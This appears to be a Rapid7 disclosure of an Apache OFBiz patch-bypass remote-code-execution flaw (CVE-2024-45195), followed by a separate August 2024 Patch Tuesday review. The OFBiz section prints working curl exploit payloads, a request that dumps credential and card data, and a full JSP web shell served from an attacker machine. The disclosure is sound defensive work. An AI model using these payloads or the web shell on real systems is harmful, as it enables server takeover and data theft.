CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed)

Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server. Exploitation is facilitated by bypassing previous patches for CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856; this patch bypass vulnerability is tracked as CVE-2024-45195.

Product Description

Apache OFBiz is an open-source web-based enterprise resource planning and customer relationship management suite. The software has features for accounting, catalog and supply chain management, storing payment information, and more. Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have seen exploitation in the wild.


This issue was reported to the Apache OFBiz team by Ryan Emmons, Lead Security Researcher at Rapid7, as well as by several other researchers. The vulnerability is being disclosed in accordance with Rapid7's vulnerability disclosure policy. Rapid7 is grateful to the Apache OFBiz open-source community developers for their assistance and collaboration on this issue.

Vulnerability Context

A handful of unauthenticated code execution CVEs for Apache OFBiz have been published in 2024. In August, the Cybersecurity and Infrastructure Security Agency added one of them, CVE-2024-32113, to its Known Exploited Vulnerabilities catalog. Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause. Since the patch bypass we are disclosing today elaborates on those previous disclosures, we’ll outline them now.


The first vulnerability in this sequence, CVE-2024-32113, was published on May 8, 2024, and it affected installs before v18.12.13. The OFBiz CVE entry describes this vulnerability as a path traversal vulnerability (CWE-22). When unexpected URI patterns are sent to the application, the state of the application’s current controller and view map is fragmented; controller-view map fragmentation takes place because the application uses multiple different methods of parsing the current URI: one to get the controller, one to get the view map.

As a result, an attacker can confuse the implemented logic to fetch and interact with an authenticated view map via an unauthenticated controller. When this happens, only the controller authorization checks will be performed, which the attacker can use to access admin-only view maps that do things like execute SQL queries or code.

An authenticated administrator view map called “ProgramExport” will execute Groovy scripts, and this view map can be leveraged to execute arbitrary code without authentication. An example payload for this vulnerability, which uses path traversal to fragment the controller-view map state, is shown below.

curl 'https://target:8443/webtools/control/forgotPassword/../ProgramExport' -d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" -vvv -k --path-as-is

The OFBiz Jira issue for the vulnerability has the description “Some URLs need to be rejected before they create problems”, which is how a fix was implemented. The remediation changes included code that attempted to normalize URLs before resolving the controller and the view map being fetched. That patch was released as v18.12.13.


The second CVE entry in this sequence, CVE-2024-36104 was published on June 4, 2024. The vulnerability was again described as a path traversal, and the OFBiz Jira issue description is “Better avoid special encoded characters sequences”. Though the patch is made up of multiple commits, the bulk of the remediation was implemented in bc856f46f8, with the following code added to remove semicolons and URL-encoded periods from the URI.

                    String uRIFiltered = new URI(initialURI)
                            .replaceAll(";", "")
                            .replaceAll("(?i)%2e", "");
                    if (!initialURI.equals(uRIFiltered)) {
                        Debug.logError("For security reason this URL is not accepted", MODULE);
                        throw new RuntimeException("For security reason this URL is not accepted");

This CVE was patched in v18.12.14.

Two different example payloads for this vulnerability are shown below, one for each of the sequences stripped by the implemented fix. Both of these payloads also work against OFBiz installations affected by the previous CVE-2024-32113, since the vulnerability has the same root cause.

curl 'https://target:8443/webtools/control/forgotPassword/;/ProgramExport' -d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" -vvv -k --path-as-is
curl 'https://target:8443/webtools/control/forgotPassword/%2e%2e/ProgramExport' -d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" -vvv -k --path-as-is


The third vulnerability in this sequence, CVE-2024-38856, was published on August 5, 2024. This time, the vulnerability was described as an incorrect authorization issue. The CVE’s description states “Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).” This more accurately describes the issue. As we’ll see in a moment, it also indicates the approach taken for the fix this time.

SonicWall’s research team, who reported the vulnerability to the OFBiz team, published an excellent blog post that nicely explains the root cause and focuses on the controller-view map state fragmentation, rather than just the method used to trigger it. Amazingly, their blog post reports that a traversal or semicolon sequence was never needed at all! A request to a path like /webtools/control/forgotPassword/ProgramExport would result in the controller being set to “forgotPassword” and the view map being set to “ProgramExport”.

An example payload for this vulnerability is shown below.

curl 'https://target:8443/webtools/control/forgotPassword/ProgramExport' -d "groovyProgram=throw+new+Exception('echo cmd output: `id`'.execute().text);" -vvv -k

This payload also works for systems affected by CVE-2024-32113 and CVE-2024-36104, since the root cause is the same for all three.

The OFBiz Jira issue for this vulnerability is titled “Add permission check for ProgramExport and EntitySQLProcessor”. That’s exactly what the fix does; the fix adds a permission check for ProgramExport and EntitySQLProcessor, two view maps targeted by previous exploits. The three lines below were added to both Groovy files associated with those view maps, effectively preventing access to them without authentication.

if (!security.hasPermission('ENTITY_MAINT', userLogin)) {

As a result, both exploit techniques were no longer viable. However, the underlying problem, the ability to fragment the controller-view map state, was not resolved by the v18.12.15 patch.


To recap, all three of the previous vulnerabilities were caused by the same shared underlying issue, the ability to desynchronize the controller and view map state. That flaw was not fully addressed by any of the patches. At the time of our research, the requestUri and overrideViewUri variables could still be desynchronized in the manner described in the SonicWall blog post, albeit not to reach ProgramExport or EntitySQLProcessor. Our testing target was v18.12.15, the latest version available at the time of research.

The framework/webtools/widget/EntityScreens.xml file defines some EntityScreens that might be leveraged by an attacker.

$ grep 'script' framework/webtools/widget/EntityScreens.xml
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/EntitySQLProcessor.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/EntityMaint.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/FindGeneric.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ViewGeneric.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ViewRelations.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/EntityRef.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/EntityRefList.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/CheckDb.groovy"/>
                <script location="component://webtools/src/test/groovy/org/apache/ofbizwebtools/entity/EntityPerformanceTest.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/XmlDsDump.groovy"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ModelInduceFromDb.groovy"/>

We can’t useProgramExport or EntitySQLProcessor this time, since authorization checks are now enforced. However, an attacker can leverage another view to exploit the application without authentication. A screenshot of the XML Data Export admin dashboard feature for one possible Groovy view screen option, XmlDsDump, is below.
CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed)

As shown above, the XmlDsDump view can be used to query the database for virtually any stored data and write the resulting data to an arbitrarily named file anywhere on disk. Notably, the affiliated Groovy script XmlDsDump.groovy does not enforce authorization checks.

As a proof of concept, we’ll try to desynchronize the controller-view map state to access the “dump” view without authentication. The following cURL request will attempt to dump all usernames, passwords, and credit card numbers stored by Apache OFBiz into a web-accessible directory.

curl 'https://target:8443/webtools/control/forgotPassword/xmldsdump' -d "outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename=stolen.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard" -k

Watching the request in a debugger confirms that the requestUri and overrideViewUri value confusion is still possible in This is depicted in the screenshot below, where our cURL request has resulted in requestUri being set to the unauthenticated endpoint and overrideViewUri being set to the authenticated view.
CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed)

After the request completes, a second unauthenticated cURL request confirms that the operation completed successfully.

$ curl 'https://target:8443/common/stolen.txt' -k
<?xml version="1.0" encoding="UTF-8"?>
    <CreditCard paymentMethodId="AMEX_01" cardType="CCT_AMERICANEXPRESS" cardNumber="378282246310005" expireDate="02/2100" companyNameOnCard="Your Company Name" firstNameOnCard="Smart" lastNameOnCard="Guy" contactMechId="9000" lastUpdatedStamp="2024-08-15 23:31:30.077" lastUpdatedTxStamp="2024-08-15 23:31:28.811" createdStamp="2024-08-15 23:31:30.077" createdTxStamp="2024-08-15 23:31:28.811"/>
    <CreditCard paymentMethodId="9015" cardType="CCT_VISA" cardNumber="4111111111111111" expireDate="02/2100" firstNameOnCard="DEMO" lastNameOnCard="CUSTOMER" contactMechId="9015" lastUpdatedStamp="2024-08-15 23:31:48.815" lastUpdatedTxStamp="2024-08-15 23:31:36.309" createdStamp="2024-08-15 23:31:48.815" createdTxStamp="2024-08-15 23:31:36.309"/>
    <CreditCard paymentMethodId="EUROCUSTOMER" cardType="CCT_VISA" cardNumber="4111111111111111" expireDate="02/2100" firstNameOnCard="EURO" lastNameOnCard="CUSTOMER" contactMechId="EUROCUSTOMER" lastUpdatedStamp="2024-08-15 23:31:48.898" lastUpdatedTxStamp="2024-08-15 23:31:36.309" createdStamp="2024-08-15 23:31:48.898" createdTxStamp="2024-08-15 23:31:36.309"/>
    <CreditCard paymentMethodId="FRENCHCUSTOMER" cardType="CCT_VISA" cardNumber="4111111111111111" expireDate="02/2100" firstNameOnCard="FRENCH" lastNameOnCard="CUSTOMER" contactMechId="FRENCHCUSTOMER" lastUpdatedStamp="2024-08-15 23:31:48.967" lastUpdatedTxStamp="2024-08-15 23:31:36.309" createdStamp="2024-08-15 23:31:48.967" createdTxStamp="2024-08-15 23:31:36.309"/>
    <UserLogin userLoginId="system" isSystem="Y" enabled="N" lastUpdatedStamp="2024-08-15 23:31:10.984" lastUpdatedTxStamp="2024-08-15 23:31:10.9" createdStamp="2024-08-15 23:31:06.603" createdTxStamp="2024-08-15 23:31:06.515" partyId="system"/>
    <UserLogin userLoginId="anonymous" enabled="N" lastUpdatedStamp="2024-08-15 23:31:06.637" lastUpdatedTxStamp="2024-08-15 23:31:06.515" createdStamp="2024-08-15 23:31:06.637" createdTxStamp="2024-08-15 23:31:06.515"/>
    <UserLogin userLoginId="admin" currentPassword="{SHA}47b56992cbc2b6d10aa1be30f20165adb305a41a" enabled="Y" lastTimeZone="America/Chicago" successiveFailedLogins="2" lastUpdatedStamp="2024-08-16 01:12:07.386" lastUpdatedTxStamp="2024-08-16 01:12:07.386" createdStamp="2024-08-15 23:31:25.561" createdTxStamp="2024-08-15 23:31:25.556" partyId="admin"/>
    <UserLogin userLoginId="flexadmin" currentPassword="{SHA}47b56994cbc2b6d10aa1be30f70165adb305a41a" lastUpdatedStamp="2024-08-15 23:31:26.341" lastUpdatedTxStamp="2024-08-15 23:31:26.278" createdStamp="2024-08-15 23:31:25.564" createdTxStamp="2024-08-15 23:31:25.556" partyId="admin"/>
    <UserLogin userLoginId="demoadmin" currentPassword="{SHA}47b56994cbc2b6d10aa1be30f70165adb305a41a" lastUpdatedStamp="2024-08-15 23:31:26.342" lastUpdatedTxStamp="2024-08-15 23:31:26.278" createdStamp="2024-08-15 23:31:25.565" createdTxStamp="2024-08-15 23:31:25.556" partyId="admin"/>
    <UserLogin userLoginId="ltdadmin" currentPassword="{SHA}47b56994cbc2b6d10aa1be30f70165adb305a41a" lastUpdatedStamp="2024-08-15 23:31:26.343" lastUpdatedTxStamp="2024-08-15 23:31:26.278" createdStamp="2024-08-15 23:31:25.566" createdTxStamp="2024-08-15 23:31:25.556" partyId="ltdadmin"/>
    <UserLogin userLoginId="ltdadmin1" currentPassword="{SHA}47b56994cbc2b6d10aa1be30f70165adb305a41a" lastUpdatedStamp="2024-08-15 23:31:26.344" lastUpdatedTxStamp="2024-08-15 23:31:26.278" createdStamp="2024-08-15 23:31:25.567" createdTxStamp="2024-08-15 23:31:25.556" partyId="ltdadmin1"/>
    <UserLogin userLoginId="bizadmin" currentPassword="{SHA}47b56994cbc2b6d10aa1be30f70165adb305a41a" lastUpdatedStamp="2024-08-15 23:31:26.345" lastUpdatedTxStamp="2024-08-15 23:31:26.278" createdStamp="2024-08-15 23:31:25.568" createdTxStamp="2024-08-15 23:31:25.556" partyId="bizadmin"/>

The password hashes and credit card numbers have been written to an accessible file in the web root, demonstrating exploitation via patch bypass. It’s likely that cracking a user password hash would succeed in a real-world attack, since the password hashing algorithm is a weak one. However, to avoid having to crack any hashes, we also leveraged the vulnerability to achieve remote code execution.

Within controller.xml, a view map called viewdatafile is defined at [0].

    <view-map name="xmldsdump" type="screen" page="component://webtools/widget/EntityScreens.xml#xmldsdump"/>
    <view-map name="xmldsrawdump" page="template/entity/xmldsrawdump.jsp"/>

    <view-map name="FindUtilCache" type="screen" page="component://webtools/widget/CacheScreens.xml#FindUtilCache"/>
    <view-map name="FindUtilCacheElements" type="screen" page="component://webtools/widget/CacheScreens.xml#FindUtilCacheElements"/>
    <view-map name="EditUtilCache" type="screen" page="component://webtools/widget/CacheScreens.xml#EditUtilCache"/>

    <view-map name="viewdatafile" type="screen" page="component://webtools/widget/MiscScreens.xml#viewdatafile"/> [0]

    <view-map name="LogConfiguration" type="screen" page="component://webtools/widget/LogScreens.xml#LogConfiguration"/>
    <view-map name="LogView" type="screen" page="component://webtools/widget/LogScreens.xml#LogView"/>
    <view-map name="FetchLogs" type="screen" page="component://webtools/widget/LogScreens.xml#FetchLogs"/>

Within framework/webtools/widget/MiscScreens.xml, viewdatafile is associated with the script ViewDataFile.groovy (at [1]).

    <screen name="viewdatafile">
                <set field="headerItem" value="main"/>
                <set field="titleProperty" value="WebtoolsDataFileMainTitle"/>
                <set field="tabButtonItem" value="data"/>
                <script location="component://webtools/src/main/groovy/org/apache/ofbiz/webtools/datafile/ViewDataFile.groovy"/> [1]
                <decorator-screen name="CommonImportExportDecorator" location="${parameters.mainDecoratorLocation}">
                    <decorator-section name="body">
                            <platform-specific><html><html-template location="component://webtools/template/datafile/ViewDataFile.ftl"/></html></platform-specific>

That script is below. It checks for various request parameters (starting at [2]) to perform file operations. At [3], if DATAFILE_SAVE is present and a datafile was parsed, the datafile contents will be written to the disk location specified by DATAFILE_SAVE.

package org.apache.ofbiz.webtools.datafile

import org.apache.ofbiz.base.util.Debug
import org.apache.ofbiz.base.util.UtilProperties
import org.apache.ofbiz.base.util.UtilURL
import org.apache.ofbiz.datafile.DataFile
import org.apache.ofbiz.datafile.DataFile2EntityXml
import org.apache.ofbiz.datafile.ModelDataFileReader

uiLabelMap = UtilProperties.getResourceBundleMap('WebtoolsUiLabels', locale)
messages = []

dataFileSave = request.getParameter('DATAFILE_SAVE') [2]

entityXmlFileSave = request.getParameter('ENTITYXML_FILE_SAVE')

dataFileLoc = request.getParameter('DATAFILE_LOCATION')
definitionLoc = request.getParameter('DEFINITION_LOCATION')
definitionName = request.getParameter('DEFINITION_NAME')
dataFileIsUrl = null != request.getParameter('DATAFILE_IS_URL')
definitionIsUrl = null != request.getParameter('DEFINITION_IS_URL')

try {
    dataFileUrl = dataFileIsUrl ? UtilURL.fromUrlString(dataFileLoc) : UtilURL.fromFilename(dataFileLoc)
catch ( e) {

try {
    definitionUrl = definitionIsUrl ? UtilURL.fromUrlString(definitionLoc) : UtilURL.fromFilename(definitionLoc)
catch ( e) {

definitionNames = null
if (definitionUrl) {
    try {
        ModelDataFileReader reader = ModelDataFileReader.getModelDataFileReader(definitionUrl)
        if (reader) {
            definitionNames = ((Collection)reader.getDataFileNames()).iterator()
            context.put('definitionNames', definitionNames)
    catch (Exception e) {

dataFile = null
if (dataFileUrl && definitionUrl && definitionNames) {
    try {
        dataFile = DataFile.readFile(dataFileUrl, definitionUrl, definitionName)
        context.put('dataFile', dataFile)
    catch (Exception e) {
        messages.add(e.toString()); Debug.log(e)

if (dataFile) {
    modelDataFile = dataFile.getModelDataFile()
    context.put('modelDataFile', modelDataFile)

if (dataFile && dataFileSave) { [3]
    try {
        messages.add(uiLabelMap.WebtoolsDataFileSavedTo + dataFileSave)
    catch (Exception e) {

if (dataFile && entityXmlFileSave) {
    try {
        DataFile2EntityXml.writeToEntityXml(entityXmlFileSave, dataFile)
        messages.add(uiLabelMap.WebtoolsDataEntityFileSavedTo + entityXmlFileSave)
    catch (Exception e) {
context.messages = messages

Apache OFBiz also ships with some example data files in datafiles.adoc. An excerpt of that text is included below.

== Examples

=== Sample fixed width CSV file posreport.csv to be imported:
.An example of fixed width flat file import.

021196033702    ,5031BB GLITTER GLUE PENS BRIGH  ,1           ,5031BB      ,       1,     299,
021196043121    ,BB4312 WONDERFOAM ASSORTED      ,1           ,BB4312      ,       1,     280,
021196055025    ,9905BB  PLUMAGE MULTICOLOURED   ,1           ,9905BB      ,       4,     396,

=== Sample xml definition file for importing select columns
.Sample xml definition file for importing select columns posschema.xml:
    <data-files xsi:noNamespaceSchemaLocation="" xmlns:xsi="">
        <data-file name="posreport" separator-style="fixed-length" type-code="text">
            <record name="tillentry" limit="many">
                <field name="tillCode" type="String" length="16" position="0"></field>
                <field name="name" type="String" length="32" position="17"></field>
                <field name="prodCode" type="String" length="12" position="63"></field>
                <field name="quantity" type="String" length="8" position="76"></field>
                <field name="totalPrice" type="String" length="8" position="85"></field>

.Another example reading fixed record little endian binary files
[source, xml]
    <data-files xsi:noNamespaceSchemaLocation="" xmlns:xsi="">
        <data-file name="stockdata" separator-style="fixed-record" type-code="text" record-length="768">
            <record name="stockdataitem" limit="many">
                <field name="barcode" type="NullTerminatedString" length="12" position="0"></field>
                <field name="prodCode" type="NullTerminatedString" length="12" position="68"></field>
                <field name="price" type="LEInteger" length="4" position="80"></field>
                <field name="name" type="NullTerminatedString" length="30" position="16"></field>

=== Procedure:
In the interface enter something like:

. Definition Filename or URL: posschema.xml
. Data File Definition Name: posreport
. Data Filename or URL: posreport.csv

This information is very helpful for contextualizing what we learned from the Groovy script. We’ll need to provide an XML definition file location, a data file XML definition name, a CSV data file location, and a file path to save the extracted data from the CSV. We’ll also need to specify that both our definition file location and CSV location are remote URLs, which we can do via the DEFINITION_IS_URL and DATAFILE_IS_URL parameters.

Below is our malicious definition file, rceschema.xml. We define a “jsp” String field within a record in the datafile. In the XML, this represents our JSP web shell that will be written to the web root.

$ cat rceschema.xml
    <data-files xsi:noNamespaceSchemaLocation="" xmlns:xsi="">
        <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
            <record name="rceentry" limit="many">
                <field name="jsp" type="String" length="605" position="0"></field>

Next, we’ll need a CSV containing a single line with a single value, our JSP web shell. This value is 605 characters long, as indicated in our XML definition. Since we’re injecting our payload into a CSV context, we’ll build a string in the JSP to avoid any commas, and we’ll delimit the payload with a comma.

$ cat rcereport.csv
<%@ page import='*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,

Lastly, we’ll start a Python web server listening on port 80 of our attack machine, then perform a cURL request to exploit the vulnerability.

POST /webtools/control/forgotPassword/viewdatafile HTTP/2
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded


After the server fetches and processes our two files, browsing the targeted accounting/index.jsp path confirms that we’ve established unauthenticated remote code execution.

CVE-2024-45195: Apache OFBiz Unauthenticated Remote Code Execution (Fixed)


We’d like to thank the Apache OFBiz team, who quickly responded to our disclosure and patched the vulnerability in v18.12.16. In this patch, authorization checks were implemented for the view. This change validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller. OFBiz users should update to the fixed version as soon as possible.

Rapid7 Customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-32113, CVE-2024-36104, CVE-2024-38856, and CVE-2024-45195 with vulnerability checks expected to be available in today’s (Thursday, September 5) content release.

Disclosure Timeline

  • August 16, 2024: Rapid7 contacts the Apache OFBiz security team via email.
  • August 17, 2024: Apache OFBiz community developer acknowledges report.
  • August 20, 2024: Apache OFBiz community developer indicates that the team has a solution.
  • August 22, 2024: CVE-2024-45195 reserved by Apache community dev team.
  • August 24, 2024: Patch sent to Rapid7 for testing.
  • August 28, 2024: Rapid7 confirms the patch is sufficient to prevent this vector of exploitation.
  • August 29, 2024: Apache OFBiz developer indicates patch ETA is early September 2024.
  • September 4, 2024: Apache OFBiz advisory published for CVE-2024-45195 (and other vulnerabilities).
  • September 5, 2024: This disclosure.
Patch Tuesday - August 2024

Microsoft is addressing 88 vulnerabilities this August 2024 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation and/or public disclosure for ten of the vulnerabilities published today, which is significantly more than usual. At time of writing, all six of the known-exploited vulnerabilities patched today are listed on CISA KEV. Microsoft is also patching five critical remote code execution (RCE) vulnerabilities today. 11 browser vulnerabilities have already been published separately this month, and are not included in the total.

Patch Tuesday watchers will know that today’s haul of four publicly-disclosed vulnerabilities and six further exploited-in-the-wild vulnerabilities is a much larger batch than usual. We’ll first address those vulnerabilities where public disclosure exists but no patch is available: the noteworthy Windows OS downgrade attacks disclosed at Black Hat last week. We’ll then examine those vulnerabilities published today which Microsoft knows to be exploited in the wild already, and then take a look at the other publicly-disclosed vulnerabilities published this month.

Windows Update: 50% patched zero-day Downdate attack

First things first: what if your patched Windows asset suddenly wasn’t patched, up to and including the hypervisor? That was the question asked and answered in a Black Hat talk by SafeBreach last week. In response, Microsoft has published two vulnerabilities. Microsoft was first notified of these vulnerabilities back in February 2024, and the advisories concede that the Black Hat talk was “appropriately coordinated with Microsoft.”

CVE-2024-38202 describes an elevation of privilege vulnerability in the Windows Update Stack, and exploitation requires that an attacker convinces an administrative user to perform a system restore — unusual, certainly, but social engineers can accomplish many things. Microsoft optimistically assesses exploitation of this vulnerability as less likely. The advisory does not explain how a user with basic privileges can modify the target asset’s System directory, which is required to plant the malicious system restore files, although the SafeBreach write-up does explain the flaw in significant detail. No patch is yet available, although the advisory states that a security update to mitigate this threat is under development. Microsoft provides several recommended actions, which do not mitigate the vulnerability, but can at least provide additional barriers to exploitation and put in place some useful additional visibility of the attack surface and exploitation attempts. One possible outcome of exploitation is that an attacker could modify the integrity and repair utility so that it will no longer detect corruptions in Windows system files.

CVE-2024-21302 is the second half of the downgrade attack pair discovered by SafeBreach. Exploitation allows an attacker with administrator privileges to replace updated Windows system files with older versions and thus reintroduce vulnerabilities to Virtualization-based security (VBS). Patches are available; however, defenders must note that the patch does not automatically remediate assets, but instead delivers an opt-in Microsoft-signed revocation policy, which brings with it the risk of a boot loop if applied and then improperly reverted. Significant guidance is available under KB5042562: Guidance for blocking rollback of Virtualization-based Security (VBS) related security updates.

Windows WinSock: zero-day EoP

Moving on to known-exploited vulnerabilities: the Windows Ancillary Function Driver for WinSock receives a patch for exploited-in-the-wild elevation of privilege vulnerability CVE-2024-38193. Successful exploitation is via a use-after-free memory management bug, and could lead to SYSTEM privileges. The advisory doesn’t provide further clues, but with existing in-the-wild exploitation, low attack complexity, no user interaction involved, and low privileges required, this is one to patch immediately to keep malware at bay.

Windows Power Dependency Coordinator: zero-day EoP

While we’re looking at exploited-in-the-wild, use-after-free vulnerabilities with minimalist advisories: CVE-2024-38107 also leads to SYSTEM privileges via abuse of the Windows Power Dependency Coordinator, which allows Windows computers to wake almost instantly from sleep. Of course, nothing comes for free: this vulnerability requires no user interaction, has low attack complexity, and requires low privileges. Patch all your Windows assets sooner rather than later.

Windows Kernel: zero-day EoP

Still on the topic of exploited-in-the-wild, elevation-to-SYSTEM vulnerabilities: CVE-2024-38106 requires an attacker to win a race condition which falls under CWE-591: Sensitive Data Storage in Improperly Locked Memory. Although the advisory for CVE-2024-38106 does not provide further detail, a reasonable assumption here might be that the vulnerability could be similar to CVE-2023-36403, where exploitation relies on a flaw in the way the Windows kernel handles locking for registry virtualization, which allows Windows to redirect globally-impactful registry read/write operations to per-user locations to support legacy applications which are not UAC-compatible. Curiously, Windows Server 2012 does not receive a patch for CVE-2024-38106, so either the vulnerability was introduced in a later codebase, or Microsoft is hoping that attackers won’t notice.

Windows SmartScreen: zero-day MotW bypass

CVE-2024-38213 describes a Mark of the Web (MotW) security bypass vulnerability in all current Windows products. An attacker who convinces a user to open a malicious file could bypass SmartScreen, which would normally warn the user about files downloaded from the internet, which Windows would otherwise have tagged with MotW. CVE-2024-38213 likely offers less utility to attackers than a broadly-similar SmartScreen bypass published in February 2024, since unlike today’s offering, the advisory for the previous CVE-2024-21351 also described the potential for code injection into SmartScreen itself. The lower CVSSv3 base score for today's CVE-2024-38213 reflects that difference.

Edge Internet Explorer mode: zero-day EoP

Although Edge RCE vulnerability CVE-2024-38178 is already known to be exploited in the wild, it likely won’t be top of anyone’s list of greatest concerns this month. The advisory clarifies that successful exploitation would require the attacker to not only convince a user to click a malicious link, but also to first prepare the target asset so that it uses Edge in Internet Explorer Mode. IE Mode provides backwards-compatibility functionality so that users can view legacy websites which rely on the fascinating idiosyncrasies of Internet Explorer; such sites are often served by enterprise legacy web applications, which goes a long way to explaining Microsoft’s continued motivation to keep Internet Explorer somewhat alive. If not already enabled on the target asset, the attacker would have to achieve a modification of Edge settings to enable the “Allow sites to be reloaded in Internet Explorer” setting. Subsequent exploitation would involve convincing the user to open an Internet Explorer mode tab within Edge and then opening the malicious URL. Remediation involves patching Windows itself; all current versions of Windows are affected.

Microsoft Project: zero-day RCE

Rounding out this month’s half dozen exploited-in-the-wild vulnerabilities is CVE-2024-38189, which describes RCE in Microsoft Project. Exploitation requires that an attacker convince the user to open a malicious file, and is possible only where the “Block macros from running in Office files from the Internet” policy is disabled — it is enabled by default — and the “VBA Macro Notification Settings” are set to a low enough level.  Happily, the Preview Pane is not an attack vector in this case.

Microsoft Office: zero-day spoofing

Published last week to acknowledge its public disclosure, and patched today for all current versions of Office, CVE-2024-38200 describes a spoofing vulnerability. Exploitation requires that the user click a malicious link. Although the advisory doesn’t describe the impact, the weakness is CWE-200: Exposure of Sensitive Information to an Unauthorized Actor, and the FAQ mentions outgoing NTLM traffic; reading between the lines, it’s highly likely that NTLM hashes are exposed upon successful exploitation.

The advisory suggests mitigating factors which may already apply, or which may prove helpful to improve security posture: adding users to the Protected Users Security Group, which prevents the use of NTLM authentication, and blocking outbound SMB connections to port 445. Both of these mitigation measures may break legacy authentication in some scenarios.

Somewhat unusually, Microsoft claims to have fixed this vulnerability twice, since in addition to today’s patches, an alternative fix was enabled via Feature Flighting on 2024-07-30 for all in-support versions of Office and 365. Microsoft still recommends that customers update to the 2024-08-13 patches to receive the final version of the fix. Somewhat confusingly, the FAQ then goes on to say that the Security Updates table will be revised when the update is publicly available; however, it’s likely that Microsoft will update the FAQ in the near future to clarify that a this was a minor FAQ editing oversight rather than a suggestion that further patches are expected.

Windows Line Printer Daemon: zero-day RCE

Line Printer Daemon (LPD) vulnerabilities are like buses: you wait ages for one, and then two come along in quick succession. Last month’s denial of service vulnerability is now joined by CVE-2024-38199, a publicly-disclosed RCE vulnerability. Exploitation requires that an attacker sends a malicious print task to a shared vulnerable Windows Line Printer Daemon service across the network. Many admins won’t need to worry about this vulnerability, since Microsoft has been encouraging everyone to migrate away from LPD for almost a decade, and it isn’t installed by default on Windows products newer than Server 2012. Still, patches are available for Windows Server 2008 SP2, Server 2022 23H2, and everything in between.

SharePoint & Exchange update

As something of an olive branch for defenders who may now be eyeing their to-do list with concern, Microsoft has not published any SharePoint or Exchange vulnerabilities this month.

Microsoft lifecycle update

All versions of Visual Studio for Mac retire on 2024-08-31 and will no longer receive any further updates — including security patches — after that date. The URL seems to anticipate that some people will have questions: Microsoft suggests the C# Dev Kit for Visual Studio Code as one possible alternative.

Summary Charts

Patch Tuesday - August 2024
Patch Tuesday - August 2024
Patch Tuesday - August 2024

Summary Tables

Apps vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38177 Windows App Installer Spoofing Vulnerability No No 7.8

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38108 Azure Stack Hub Spoofing Vulnerability No No 9.3
CVE-2024-38109 Azure Health Bot Elevation of Privilege Vulnerability No No 9.1
CVE-2024-38195 Azure CycleCloud Remote Code Execution Vulnerability No No 7.8
CVE-2024-38098 Azure Connected Machine Agent Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38162 Azure Connected Machine Agent Elevation of Privilege Vulnerability No No 7.8
CVE-2024-38201 Azure Stack Hub Elevation of Privilege Vulnerability No No 7

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-38218 Microsoft Edge (HTML-based) Memory Corruption Vulnerability No No 8.4
CVE-2024-38219 Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability No No 6.5
CVE-2024-7536 Chromium: CVE-2024-7550 Type Confusion in V8 No No N/A
CVE-2024-7535 Chromium: CVE-2024-7536 Use after free in WebAudio No No N/A
CVE-2024-7534 Chromium: CVE-2024-7535 Inappropriate implementation in V8 No No N/A
CVE-2024-7533 Chromium: CVE-2024-7534 Heap buffer overflow in Layout No No N/A
CVE-2024-7532 Chromium: CVE-2024-7533 Use after free in Sharing No No N/A
CVE-2024-7550 Chromium: CVE-2024-7532 Out of bounds memory access in ANGLE No No N/A
CVE-2024-7256 Chromium: CVE-2024-7256 Insufficient data validation in Dawn No No N/A
CVE-2024-7255 Chromium: CVE-2024-7255 Out of bounds read in WebTransport No No N/A
CVE-2024-6990 Chromium: CVE-2024-6990 Uninitialized Use in Dawn No No N/A
